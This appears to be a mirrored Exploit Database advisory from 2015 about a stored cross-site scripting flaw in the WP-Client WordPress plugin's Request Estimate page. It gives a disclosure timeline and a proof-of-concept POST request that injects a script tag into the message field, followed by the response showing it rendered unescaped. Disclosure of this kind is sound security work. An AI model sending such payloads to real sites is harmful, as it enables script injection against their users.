WordPress Plugin WP-Client 3.8.7 – Persistent Cross-Site Scripting

• Exploit Database
• 109 阅读

• 作者： Pier-Luc Maltais
  日期： 2015-11-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38803/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

  ##################################################################################### Application: WP-Client Version: 3.8.7 Author: Pier-Luc Maltais from COSIG Twitter: @COSIG_ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC   ##################################################################################### =============== 1) Introduction =============== One plugin configures multiple areas of your WordPress installation and allows the site Administrator to easily create new Client Areas, Client Management Portals, Client Estimates & Invoices, Client File Upload Areas, or Private Staff Pages on the site by enteringjust a few data fields. Additionally, clients can upload/download secure files. (https://wp-client.com/)   ============================ 2) Report Timeline ============================ 12/11/2015 - Found the vulnerability 12/11/2015 - Ticket opened 20/11/2015 - Plugin extension Estimates/Invoices updated (v1.5.2) 24/11/2015 - Public disclosure ============================ 3) Technical details ============================ WP-Client is vulnerable to a stored XSS attack in the Request Estimate page. The extension affected is Estimates/Invoices v1.5.1.     ============================ 4) POC ============================ Request :   POST /portal/request-estimate/ HTTP/1.1 [...] wpc_data%5Baction%5D=request&wpc_data%5Btitle%5D=Request+Estimate+from+2015-11-12&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescription%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bquantity%5D=1&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bprice%5D=&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E Response :   [...] <div class="wpc_clear"></div> <span>Comments:</span><br> <table id="wpc_inv_table_request_notes" style="width: 100%;"> <tr bgcolor="E0E0E0"> <td><b>client:</b></td> <td><script>alert(1)</script> [...]   #####################################################################################